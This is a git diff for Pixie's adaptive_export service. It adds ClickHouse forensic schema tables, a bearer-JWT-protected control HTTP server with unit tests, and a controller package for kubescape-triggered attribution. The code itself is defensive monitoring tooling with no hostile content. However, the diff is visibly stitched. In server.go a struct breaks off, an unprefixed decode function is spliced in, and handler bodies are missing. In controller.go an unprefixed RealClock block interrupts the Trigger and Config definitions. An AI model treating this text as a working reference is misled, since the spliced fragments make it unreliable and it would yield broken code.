Re-added to the rev-2 schema so the +-- adaptive_export retention scripts can persist it. local_addr/local_port are +-- intentionally absent — the pixie kConnStatsElements set carries only +-- remote_addr/remote_port (the connection is identified by the local upid + +-- the remote tuple). Rows are stored as-is by plain MergeTree, sorted by (hostname, +-- event_time); no aggregating engine because each retention-script +-- pull is a discrete snapshot row. +CREATE TABLE IF NOT EXISTS forensic_db.conn_stats ( + time_ DateTime64(9, 'UTC'), + upid String, + namespace String, + pod String, + remote_addr String, + remote_port Int64, + trace_role Int64, + addr_family Int64, + protocol Int64, + ssl UInt8, + conn_open Int64, + conn_close Int64, + conn_active Int64, + bytes_sent Int64, + bytes_recv Int64, + hostname String, + event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) +) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + +-- ============================================================================ +-- adaptive_attribution — operator's primary write target in ClickHouse (trigger_watermark is the second). +-- +-- One row per active anomaly hash per node. The operator inserts one row +-- per arriving kubescape_log on its node. ReplacingMergeTree(t_end) collapses +-- re-inserts to the row with the largest t_end — so each fresh anomaly with +-- the same hash extends the active window automatically; stale rows merge +-- away. 
+-- +-- Analyst joins: +-- +-- SELECT he.*, attr.anomaly_hash +-- FROM forensic_db.http_events he +-- ASOF INNER JOIN forensic_db.adaptive_attribution attr +-- ON he.hostname = attr.hostname +-- AND he.namespace = attr.namespace +-- AND he.pod = attr.pod +-- AND he.time_ >= attr.t_start +-- WHERE he.time_ <= attr.t_end +-- AND attr.anomaly_hash = '<anomaly_hash>'; +-- +-- Boot-time rehydration of the operator's in-memory active set: +-- +-- SELECT * FROM forensic_db.adaptive_attribution FINAL +-- WHERE hostname = '<hostname>' AND t_end > now64(9); +-- +-- DateTime64(9, 'UTC') — pin tz so bare-string serialization is +-- unambiguous; without it, CH parses incoming timestamps in the +-- server-session timezone and silently shifts values on non-UTC hosts. +-- ============================================================================ +CREATE TABLE IF NOT EXISTS forensic_db.adaptive_attribution ( + anomaly_hash String, + namespace String, + pod String, + comm String, + pid UInt64, + hostname String, + t_start DateTime64(9, 'UTC'), + t_end DateTime64(9, 'UTC'), + last_seen DateTime64(9, 'UTC'), + last_rule_id String, + n_anomalies UInt64 +) ENGINE = ReplacingMergeTree(t_end) + PARTITION BY toYYYYMM(t_start) + ORDER BY (hostname, anomaly_hash); + +-- ============================================================================ +-- trigger_watermark — persistent cursor for the kubescape_logs trigger. +-- +-- Per node, per source-table. The operator advances the row's `watermark` +-- (UInt64 event_time, ns) every time it successfully drains a batch of +-- kubescape rows. On restart it reads the row back and resumes from there +-- instead of replaying the full table from event_time=0 (which, on a busy +-- cluster, produces multi-GiB single-shot SELECTs that the HTTP client +-- times out on, never advancing → infinite stuck loop). +-- +-- ReplacingMergeTree(updated_at) collapses re-inserts to the newest, so +-- the operator can INSERT cheaply without bothering with UPDATE +-- semantics. 
Reads use FINAL — cheap because cardinality is one row per +-- (hostname, table_name). +-- +-- This is the operator's second write target alongside adaptive_attribution. +-- ============================================================================ +CREATE TABLE IF NOT EXISTS forensic_db.trigger_watermark ( + hostname String, + table_name String, + watermark UInt64, + updated_at DateTime64(9, 'UTC') +) ENGINE = ReplacingMergeTree(updated_at) + PARTITION BY hostname + ORDER BY (hostname, table_name); + +-- ============================================================================ +-- ae_reconcile — per-pull write-fidelity instrument (gated by ADAPTIVE_RECONCILE). +-- +-- One row per data-plane pull: how many rows AE READ back from Pixie for a +-- (table, pod, window) vs how many it WROTE to ClickHouse. Lets a reconcile +-- run localize any loss to a single hop: +-- read < px-direct PEM count → query/window/filter miss (R5) +-- wrote < read → sink/batch drop (R6) +-- CH distinct > read → re-pull duplication (C8) +-- Plain MergeTree (append-only debug log). NOT a pixie observation table and +-- NOT in PixieTables(); the operator creates it so a reconcile run has a +-- target without manual DDL. +-- ============================================================================ +CREATE TABLE IF NOT EXISTS forensic_db.ae_reconcile ( + ts DateTime64(9, 'UTC'), + mode String, + table_name String, + namespace String, + pod String, + win_start DateTime64(9, 'UTC'), + win_end DateTime64(9, 'UTC'), + read_count Int64, + wrote_count Int64, + write_err String, + hostname String +) ENGINE = MergeTree + PARTITION BY toYYYYMMDD(ts) + ORDER BY (table_name, ts) + -- append-only debug log; cap growth so long reconcile runs don't accumulate + -- unbounded storage (CodeRabbit). 30d matches the kubescape_logs TTL (the pixie observation tables set none). 
+ TTL toDateTime(ts) + INTERVAL 30 DAY DELETE; + +-- dx_attack_graph — dx evidence-graph edge list: one row per directed hop of an +-- investigation (delivery/egress/execution/exfil/pivot), read by the Pixie +-- dx_evidence_graph UI via px.DataFrame(clickhouse_dsn=...). Operator-owned +-- (dx emits the edges, AE persists them); NOT a pixie socket_tracer table. +-- +-- event_time (unix NANOSECONDS) + hostname are REQUIRED: Pixie's clickhouse_dsn +-- query template hardcodes `WHERE event_time >= ... AND hostname = ... ORDER BY +-- event_time` — a table without those columns fails with "Unknown identifier +-- event_time". Same convention as kubescape_logs. event_time is nanos, so the +-- partition/TTL use fromUnixTimestamp64Nano (toDateTime would read ns as seconds +-- → year ~58e9 → broken partitions; see the soc#225 fix). +CREATE TABLE IF NOT EXISTS forensic_db.dx_attack_graph ( + investigation_id String, + event_time UInt64, + hostname String, + requestor_pod String, + responder_pod String, + requestor_service String, + responder_service String, + requestor_ip String, + responder_ip String, + -- Int64/Float64 ONLY for the numeric columns: Pixie's clickhouse_dsn type + -- mapper reads UInt8 as BOOLEAN and does not handle UInt16/UInt32/Float32, + -- so those fail px marshaling with "Column[N] given incorrect type". Int64 + -- + Float64 map cleanly (INT64→Int64, FLOAT64→Float64). event_time stays + -- UInt64 (same as kubescape_logs, which px reads fine). 
+ weight Int64, + max_severity Int64, + confidence Float64, + edge_kind String, + `condition` String, + criteria String, + num_findings Int64 +) ENGINE = MergeTree() + ORDER BY (event_time, hostname) + PARTITION BY toYYYYMM(fromUnixTimestamp64Nano(event_time)) + TTL toDateTime(fromUnixTimestamp64Nano(event_time)) + INTERVAL 30 DAY DELETE + SETTINGS index_granularity = 8192; + +-- dx_attack_graph_malicious — rule-ins-only view (condition != '') the +-- dx_evidence_graph UI reads by default so benign rows stay in ClickHouse. +CREATE VIEW IF NOT EXISTS forensic_db.dx_attack_graph_malicious AS + SELECT * FROM forensic_db.dx_attack_graph WHERE `condition` != ''; diff --git a/src/vizier/services/adaptive_export/internal/config/BUILD.bazel b/src/vizier/services/adaptive_export/internal/config/BUILD.bazel index 4d19f27afab..393e71fe298 100644 --- a/src/vizier/services/adaptive_export/internal/config/BUILD.bazel +++ b/src/vizier/services/adaptive_export/internal/config/BUILD.bazel @@ -18,17 +18,12 @@ load("@io_bazel_rules_go//go:def.bzl", "go_library") go_library( name = "config", - srcs = [ - "config.go", - "definition.go", - ], + srcs = ["config.go"], importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/config", visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], deps = [ "//src/utils/shared/k8s", - "//src/vizier/services/adaptive_export/internal/script", "@com_github_sirupsen_logrus//:logrus", - "@in_gopkg_yaml_v2//:yaml_v2", "@io_k8s_apimachinery//pkg/apis/meta/v1:meta", "@io_k8s_client_go//kubernetes", "@io_k8s_client_go//rest", diff --git a/src/vizier/services/adaptive_export/internal/config/definition.go b/src/vizier/services/adaptive_export/internal/config/definition.go deleted file mode 100644 index 2f663ac9422..00000000000 --- a/src/vizier/services/adaptive_export/internal/config/definition.go +++ /dev/null @@ -1,65 +0,0 @@ -// Copyright 2018- The Pixie Authors. 
-// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -// SPDX-License-Identifier: Apache-2.0 - -package config - -import ( - "os" - "path/filepath" - "strings" - - "gopkg.in/yaml.v2" - - "px.dev/pixie/src/vizier/services/adaptive_export/internal/script" -) - -const scriptExtension = ".yaml" - -// ReadScriptDefinitions reads the script definition from the given directory path. -// Only .yaml files are read and subdirectories are not traversed. -func ReadScriptDefinitions(dir string) ([]*script.ScriptDefinition, error) { - if _, err := os.Stat(dir); os.IsNotExist(err) { - return nil, nil - } - files, err := os.ReadDir(dir) - if err != nil { - return nil, err - } - var l []*script.ScriptDefinition - for _, file := range files { - if strings.HasSuffix(file.Name(), scriptExtension) { - description, err := readScriptDefinition(filepath.Join(dir, file.Name())) - if err != nil { - return nil, err - } - l = append(l, description) - } - } - return l, nil -} - -func readScriptDefinition(path string) (*script.ScriptDefinition, error) { - content, err := os.ReadFile(path) - if err != nil { - return nil, err - } - var definition script.ScriptDefinition - err = yaml.Unmarshal(content, &definition) - if err != nil { - return nil, err - } - return &definition, nil -} diff --git a/src/vizier/services/adaptive_export/internal/control/BUILD.bazel b/src/vizier/services/adaptive_export/internal/control/BUILD.bazel new file mode 100644 index 00000000000..c22b1b8ba71 --- /dev/null 
+++ b/src/vizier/services/adaptive_export/internal/control/BUILD.bazel @@ -0,0 +1,41 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "control", + srcs = ["server.go"], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/control", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], + deps = [ + "//src/shared/services/utils", + "//src/vizier/services/adaptive_export/internal/activeset", + "//src/vizier/services/adaptive_export/internal/anomaly", + ], +) + +pl_go_test( + name = "control_test", + srcs = ["server_test.go"], + embed = [":control"], + deps = [ + "//src/shared/services/utils", + "//src/vizier/services/adaptive_export/internal/activeset", + "//src/vizier/services/adaptive_export/internal/anomaly", + ], +) diff --git a/src/vizier/services/adaptive_export/internal/control/server.go b/src/vizier/services/adaptive_export/internal/control/server.go new file mode 100644 index 00000000000..05837596d6a --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/control/server.go @@ -0,0 +1,237 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. 
+// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package control is the external control surface. It lets the controller +// (the diagnostician) steer this AE (the hands): start/stop exporting a +// target, and order a specific (table, window) query. AE's existing +// kubescape-trigger → controller → activeSet flow is untouched; this is an +// additional, env-gated driver of the same activeSet. Off unless +// CONTROL_ADDR is set. +// +// The handlers depend on narrow interfaces (exporter, queryRunner) — not on +// the concrete Controller — so the package is unit-testable with fakes and so +// the blast radius on AE is a single wiring line in main.go. +package control + +import ( + "bytes" + "context" + "encoding/json" + "net/http" + "strings" + "time" + + jwtutils "px.dev/pixie/src/shared/services/utils" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" +) + +// exporter is the slice of *activeset.ActiveSet this package needs: the controller +// decides membership, AE's streaming/controller acts on the deltas. +type exporter interface { + Upsert(k activeset.Key, tEnd time.Time) + Remove(k activeset.Key) +} + +// queryRunner executes one controller-ordered (table, target, window) query and +// writes the result through AE's normal sink. The query_id is carried so +// exported rows can be flagged provisional→confirmed/benign_retire (audit). 
+type queryRunner interface { + OrderQuery(target anomaly.Target, table string, start, end time.Time, queryID string) error +} + +// graphWriter persists dx evidence-graph edges (newline-delimited JSON, +// JSONEachRow) to forensic_db.dx_attack_graph. nil → /dx/attack_graph 501s. +type graphWriter interface { + WriteAttackGraph(ctx context.Context, jsonEachRow []byte) error +} + +// Server is the control HTTP surface. +type Server struct { + set exporter + runner queryRunner // may be nil; /query then returns 501 + graph graphWriter // may be nil; /dx/attack_graph then returns 501 + mux *http.ServeMux + verify func(bearer string) error // nil → auth disabled; set via SetAuth +} + +// New builds the control server. runner may be nil for deployments that +// only need start/stop (no operator-side one-shot queries). +func New(set exporter, runner queryRunner) *Server { + s := &Server{set: set, runner: runner, mux: http.NewServeMux()} + s.mux.HandleFunc("/healthz", s.handleHealth) + s.mux.HandleFunc("/export/start", s.handleStart) + s.mux.HandleFunc("/export/stop", s.handleStop) + s.mux.HandleFunc("/query", s.handleQuery) + s.mux.HandleFunc("/dx/attack_graph", s.handleDXAttackGraph) + return s +} + +// SetGraphWriter wires the dx_attack_graph sink. +func (s *Server) SetGraphWriter(g graphWriter) { s.graph = g } + +// SetAuth turns on bearer-JWT auth for the control surface, verified with the +// SAME shared lib + signing key the vizier broker/PEM use (px.dev/pixie/src/ +// shared/services/utils). dx already mints a service JWT (GenerateJWTForService, +// PL_JWT_SIGNING_KEY) for its broker/PEM queries — it attaches the same token +// here. No new secret/crypto. /healthz stays open for k8s probes. +// (CodeRabbit: protect control endpoints with auth — server.go.) 
+func (s *Server) SetAuth(signingKey, audience string) { + s.verify = func(bearer string) error { + _, err := jwtutils.ParseToken(bearer, signingKey, audience) + return err + } +} + +// Handler exposes the mux (for httptest + main.go wiring), wrapped in the auth +// middleware when SetAuth was called. +func (s *Server) Handler() http.Handler { + if s.verify == nil { + return s.mux + } + return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + if r.URL.Path != "/healthz" { // probes stay unauthenticated + const p = "Bearer " + h := r.Header.Get("Authorization") + if !strings.HasPrefix(h, p) || s.verify(strings.TrimPrefix(h, p)) != nil { + w.WriteHeader(http.StatusUnauthorized) + return + } + } + s.mux.ServeHTTP(w, r) + }) +} + +// handleDXAttackGraph ingests a JSON array of dx evidence-graph edges and writes +// them to forensic_db.dx_attack_graph (as JSONEachRow). +func (s *Server) handleDXAttackGraph(w http.ResponseWriter, r *http.Request) { + if r.Method != http.MethodPost { + w.WriteHeader(http.StatusMethodNotAllowed) + return + } + if s.graph == nil { + w.WriteHeader(http.StatusNotImplemented) + return + } + var edges []json.RawMessage + if !decode(r, &edges) { + w.WriteHeader(http.StatusBadRequest) + return + } + if len(edges) == 0 { + w.WriteHeader(http.StatusAccepted) + return + } + var buf bytes.Buffer + for _, e := range edges { + buf.Write(e) + buf.WriteByte('\n') + } + if err := s.graph.WriteAttackGraph(r.Context(), buf.Bytes()); err != nil { + w.WriteHeader(http.StatusBadGateway) + return + } + w.WriteHeader(http.StatusAccepted) +} + +// ── wire types ──────────────────────────────────────────────────────── +type targetReq struct { + Namespace string `json:"namespace"` + Pod string `json:"pod"` + Comm string `json:"comm"` +} + +type startReq struct { + targetReq + TEnd int64 `json:"t_end"` // unix seconds +} + +type queryReq struct { + targetReq + Table string `json:"table"` + Window [2]int64 `json:"window"` // [start,end] unix seconds + 
// decode reads the request body as JSON into v and reports whether that
// succeeded. The body is always closed. Reads are capped so a single request
// cannot make the control surface buffer an arbitrarily large payload: a body
// over the cap fails to decode, which callers already map to 400.
func decode(r *http.Request, v any) bool {
	// Generous for control messages and edge batches; NOTE(review): confirm
	// against the largest dx attack-graph batch expected in one POST.
	const maxBodyBytes = 8 << 20

	// A nil ResponseWriter is fine here: the reader then only enforces the
	// limit and does not try to flag the connection.
	body := http.MaxBytesReader(nil, r.Body, maxBodyBytes)
	defer body.Close()
	return json.NewDecoder(body).Decode(v) == nil
}
w.WriteHeader(http.StatusAccepted) +} diff --git a/src/vizier/services/adaptive_export/internal/control/server_test.go b/src/vizier/services/adaptive_export/internal/control/server_test.go new file mode 100644 index 00000000000..429cdf8a472 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/control/server_test.go @@ -0,0 +1,199 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package control + +import ( + "net/http" + "net/http/httptest" + "strings" + "testing" + "time" + + jwtutils "px.dev/pixie/src/shared/services/utils" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" +) + +// fakeExporter records Upsert/Remove calls (the controller → activeSet contract). +type fakeExporter struct { + upserts []activeset.Key + removes []activeset.Key + lastEnd time.Time +} + +func (f *fakeExporter) Upsert(k activeset.Key, tEnd time.Time) { + f.upserts = append(f.upserts, k) + f.lastEnd = tEnd +} +func (f *fakeExporter) Remove(k activeset.Key) { f.removes = append(f.removes, k) } + +// fakeRunner records OrderQuery calls; err controls the failure path. 
+type fakeRunner struct { + calls []string // "table|ns/pod|queryID" + err error +} + +func (f *fakeRunner) OrderQuery(t anomaly.Target, table string, start, end time.Time, qid string) error { + f.calls = append(f.calls, table+"|"+t.Namespace+"/"+t.Pod+"|"+qid) + return f.err +} + +func do(t *testing.T, srv *Server, method, path, body string) *http.Response { + t.Helper() + req := httptest.NewRequest(method, path, strings.NewReader(body)) + w := httptest.NewRecorder() + srv.Handler().ServeHTTP(w, req) + return w.Result() +} + +// TestControlAuth: with SetAuth on, every endpoint except /healthz requires a +// valid bearer JWT minted by the shared lib (the same one dx uses); missing/bad +// tokens get 401. (CodeRabbit: protect control endpoints with auth.) +func TestControlAuth(t *testing.T) { + const key = "0123456789abcdef0123456789abcdef" // HS256 test key + srv := New(&fakeExporter{}, nil) + srv.SetAuth(key, "vizier") + h := srv.Handler() + + good, err := jwtutils.SignJWTClaims(jwtutils.GenerateJWTForService("dx", "vizier"), key) + if err != nil { + t.Fatalf("mint token: %v", err) + } + call := func(path, auth string) int { + req := httptest.NewRequest(http.MethodPost, path, strings.NewReader(`{"pod":"p","t_end":1}`)) + if auth != "" { + req.Header.Set("Authorization", auth) + } + w := httptest.NewRecorder() + h.ServeHTTP(w, req) + return w.Result().StatusCode + } + if got := call("/export/start", ""); got != http.StatusUnauthorized { + t.Fatalf("no bearer: want 401, got %d", got) + } + if got := call("/export/start", "Bearer not-a-jwt"); got != http.StatusUnauthorized { + t.Fatalf("bad bearer: want 401, got %d", got) + } + if got := call("/export/start", "Bearer "+good); got == http.StatusUnauthorized { + t.Fatalf("valid bearer wrongly rejected (401)") + } + reqH := httptest.NewRequest(http.MethodGet, "/healthz", nil) // probes stay open + wH := httptest.NewRecorder() + h.ServeHTTP(wH, reqH) + if wH.Result().StatusCode == http.StatusUnauthorized { + 
t.Fatal("/healthz must not require auth") + } +} + +func TestStartExportUpserts(t *testing.T) { + ex := &fakeExporter{} + srv := New(ex, nil) + resp := do(t, srv, http.MethodPost, "/export/start", + `{"namespace":"log4j-poc","pod":"chain-backend-abc","comm":"sh","t_end":1717200600}`) + if resp.StatusCode != http.StatusAccepted { + t.Fatalf("status = %d, want 202", resp.StatusCode) + } + if len(ex.upserts) != 1 || ex.upserts[0].Pod != "chain-backend-abc" || + ex.upserts[0].Namespace != "log4j-poc" { + t.Fatalf("upsert = %+v, want one for log4j-poc/chain-backend-abc", ex.upserts) + } + if ex.lastEnd != time.Unix(1717200600, 0) { + t.Fatalf("tEnd = %v, want 1717200600", ex.lastEnd) + } +} + +func TestStopExportRemoves(t *testing.T) { + ex := &fakeExporter{} + srv := New(ex, nil) + resp := do(t, srv, http.MethodPost, "/export/stop", + `{"namespace":"log4j-poc","pod":"chain-backend-abc"}`) + if resp.StatusCode != http.StatusAccepted { + t.Fatalf("status = %d, want 202", resp.StatusCode) + } + if len(ex.removes) != 1 || ex.removes[0].Pod != "chain-backend-abc" { + t.Fatalf("remove = %+v, want one for chain-backend-abc", ex.removes) + } +} + +func TestOrderQueryRunsAndCarriesID(t *testing.T) { + ex := &fakeExporter{} + rn := &fakeRunner{} + srv := New(ex, rn) + resp := do(t, srv, http.MethodPost, "/query", + `{"namespace":"log4j-poc","pod":"p","comm":"sh","table":"conn_stats","window":[100,200],"query_id":"log4j-poc:p:conn_stats:100-200"}`) + if resp.StatusCode != http.StatusAccepted { + t.Fatalf("status = %d, want 202", resp.StatusCode) + } + if len(rn.calls) != 1 || rn.calls[0] != "conn_stats|log4j-poc/p|log4j-poc:p:conn_stats:100-200" { + t.Fatalf("calls = %v", rn.calls) + } +} + +func TestQueryWithoutRunnerIs501(t *testing.T) { + srv := New(&fakeExporter{}, nil) // no runner wired + resp := do(t, srv, http.MethodPost, "/query", + `{"namespace":"n","pod":"p","table":"conn_stats","window":[1,2],"query_id":"x"}`) + if resp.StatusCode != http.StatusNotImplemented { + 
t.Fatalf("status = %d, want 501", resp.StatusCode) + } +} + +func TestBadInputRejected(t *testing.T) { + srv := New(&fakeExporter{}, &fakeRunner{}) + // missing pod + if r := do(t, srv, http.MethodPost, "/export/start", `{"namespace":"n"}`); r.StatusCode != http.StatusBadRequest { + t.Fatalf("start no-pod = %d, want 400", r.StatusCode) + } + // malformed json + if r := do(t, srv, http.MethodPost, "/export/stop", `{not json`); r.StatusCode != http.StatusBadRequest { + t.Fatalf("stop bad-json = %d, want 400", r.StatusCode) + } + // query missing table + if r := do(t, srv, http.MethodPost, "/query", `{"pod":"p","query_id":"x","window":[1,2]}`); r.StatusCode != http.StatusBadRequest { + t.Fatalf("query no-table = %d, want 400", r.StatusCode) + } +} + +func TestWrongMethodRejected(t *testing.T) { + srv := New(&fakeExporter{}, &fakeRunner{}) + if r := do(t, srv, http.MethodGet, "/export/start", ``); r.StatusCode != http.StatusMethodNotAllowed { + t.Fatalf("GET start = %d, want 405", r.StatusCode) + } +} + +func TestRunnerErrorIsBadGateway(t *testing.T) { + rn := &fakeRunner{err: errFake} + srv := New(&fakeExporter{}, rn) + r := do(t, srv, http.MethodPost, "/query", + `{"namespace":"n","pod":"p","table":"conn_stats","window":[1,2],"query_id":"x"}`) + if r.StatusCode != http.StatusBadGateway { + t.Fatalf("runner-error = %d, want 502", r.StatusCode) + } +} + +func TestHealthz(t *testing.T) { + srv := New(&fakeExporter{}, nil) + if r := do(t, srv, http.MethodGet, "/healthz", ``); r.StatusCode != http.StatusOK { + t.Fatalf("healthz = %d, want 200", r.StatusCode) + } +} + +type fakeErr struct{} + +func (fakeErr) Error() string { return "boom" } + +var errFake = fakeErr{} diff --git a/src/vizier/services/adaptive_export/internal/controller/BUILD.bazel b/src/vizier/services/adaptive_export/internal/controller/BUILD.bazel new file mode 100644 index 00000000000..5e19fbeaf1e --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/controller/BUILD.bazel @@ -0,0 +1,44 @@ +# 
Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "controller", + srcs = ["controller.go"], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/controller", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], + deps = [ + "//src/vizier/services/adaptive_export/internal/anomaly", + "//src/vizier/services/adaptive_export/internal/kubescape", + "//src/vizier/services/adaptive_export/internal/pxl", + "//src/vizier/services/adaptive_export/internal/reconcile", + "//src/vizier/services/adaptive_export/internal/sink", + "@com_github_sirupsen_logrus//:logrus", + ], +) + +pl_go_test( + name = "controller_test", + srcs = ["controller_test.go"], + embed = [":controller"], + deps = [ + "//src/vizier/services/adaptive_export/internal/anomaly", + "//src/vizier/services/adaptive_export/internal/kubescape", + "//src/vizier/services/adaptive_export/internal/sink", + ], +) diff --git a/src/vizier/services/adaptive_export/internal/controller/controller.go b/src/vizier/services/adaptive_export/internal/controller/controller.go new file mode 100644 index 00000000000..601c3a27b30 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/controller/controller.go @@ -0,0 +1,760 @@ +// Copyright 2018- The Pixie Authors. 
+// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package controller orchestrates the adaptive-write push flow on a +// single node: +// +// 1. Subscribe to a Trigger that produces kubescape.Event values. +// 2. For each event, derive the workload anomaly.Target + AnomalyHash, +// look up the in-memory active set for this hostname, and either +// open a new active row or extend an existing one (t_end ← now+after). +// 3. Persist the resulting AttributionRow to ClickHouse via Sink. +// +// The controller does NOT execute PxL itself, does NOT write pixie +// observation rows, and does NOT manage retention scripts. Pixie's +// retention plugin (driven by user-defined PxL scripts in the UI) +// owns those concerns. Operator's only output is forensic_db.adaptive_attribution. +package controller + +import ( + "context" + "sync" + "time" + + log "github.com/sirupsen/logrus" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/kubescape" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/pxl" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/reconcile" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink" +) + +// Trigger is the source of new kubescape events. 
// RealClock is the wall-clock implementation used outside of tests.
type RealClock struct{}

// Now reports the current time exactly as time.Now does.
func (RealClock) Now() time.Time {
	return time.Now()
}
. Used in environments where the cloud's + // retention plugin can't reach the in-cluster CH service. + PushPixieTables []string + + // PushRefreshInterval — how often pushPixieRows re-queries pixie + // while the attribution window is still active. The first query + // covers [t_start, now]; subsequent queries cover only the new + // per-table slice [last_upper[table], now] so we don't duplicate + // rows. Zero (the natural Go default for unset env vars) is + // rewritten to 30s in defaulted(). To DISABLE periodic re-fan-out + // (single-shot mode, which loses pixie traffic that arrives after + // the kubescape event) set this to a NEGATIVE duration — pick -1 + // to be unambiguous. + PushRefreshInterval time.Duration + + // === Throughput-protection knobs === + // + // At high anomaly rates (many concurrent active hashes), the default + // pushPixieRows behavior — N parallel PxL queries per hash, no + // global cap — can DoS the vizier-query-broker (observed: 90% of + // queries DeadlineExceeded at 180s under 4× sweep load). The three + // knobs below are independent throttles; all default to 0 (= legacy + // unbounded behavior preserved). + // + // MaxParallelQueriesPerHash caps concurrent goroutines INSIDE one + // pushPixieRows pass. 0 = no cap (current). Recommended 3-5 for + // load-protective deployments. + MaxParallelQueriesPerHash int + + // MaxInflightQueriesGlobal caps concurrent PxL queries across all + // pushPixieRows goroutines (every hash). 0 = no cap (current). + // Recommended 20-50 — sized to broker capacity. + MaxInflightQueriesGlobal int + + // EmptyResultSkipAfterN: after this many consecutive 0-row returns + // for the same (pod, table) pair, skip that pair on subsequent + // passes for EmptyResultSkipTTL. 0 = disabled (current). A pgsql + // pod that never speaks HTTP returns 0 on every http_events + // query; skipping eliminates that waste. 
+ EmptyResultSkipAfterN int + + // EmptyResultSkipTTL controls how long a (pod, table) stays in the + // negative cache. 0 = disabled (current). When the TTL expires the + // pair is retried, so a pod that newly starts a protocol + // self-heals within at most TTL seconds. + EmptyResultSkipTTL time.Duration + + // OnAttribution, when non-nil, is called for every event after + // the attribution row has been computed (whether the row is new + // or an extension). The rev-3 streaming path uses this to feed + // its ActiveSet without touching controller internals. + // + // Contract: + // - Called from controller.handle's goroutine. + // - Synchronous; do NOT block. Callbacks that need to do work + // should hand off to a goroutine + buffered channel internally. + // - tEnd is the post-event t_end (= now + After for new rows, + // or the extended value for existing ones). + OnAttribution func(namespace, pod string, tEnd time.Time) + + // OnPrune, when non-nil, is called for each hash evicted by + // PruneExpired with the (namespace, pod) of the evicted row. + // Used by the rev-3 streaming path to shrink its ActiveSet. + // Same contract as OnAttribution: synchronous, non-blocking. + OnPrune func(namespace, pod string) +} + +func (c *Config) defaulted() Config { + out := *c + if out.Before == 0 { + out.Before = 5 * time.Minute + } + if out.After == 0 { + out.After = 5 * time.Minute + } + // Zero → fall through to the 30s default. NEGATIVE values are + // preserved so callers can explicitly request single-shot mode + // (see PushRefreshInterval doc above). + if out.PushRefreshInterval == 0 { + out.PushRefreshInterval = 30 * time.Second + } + return out +} + +// Controller is the live orchestrator. One instance per operator process. 
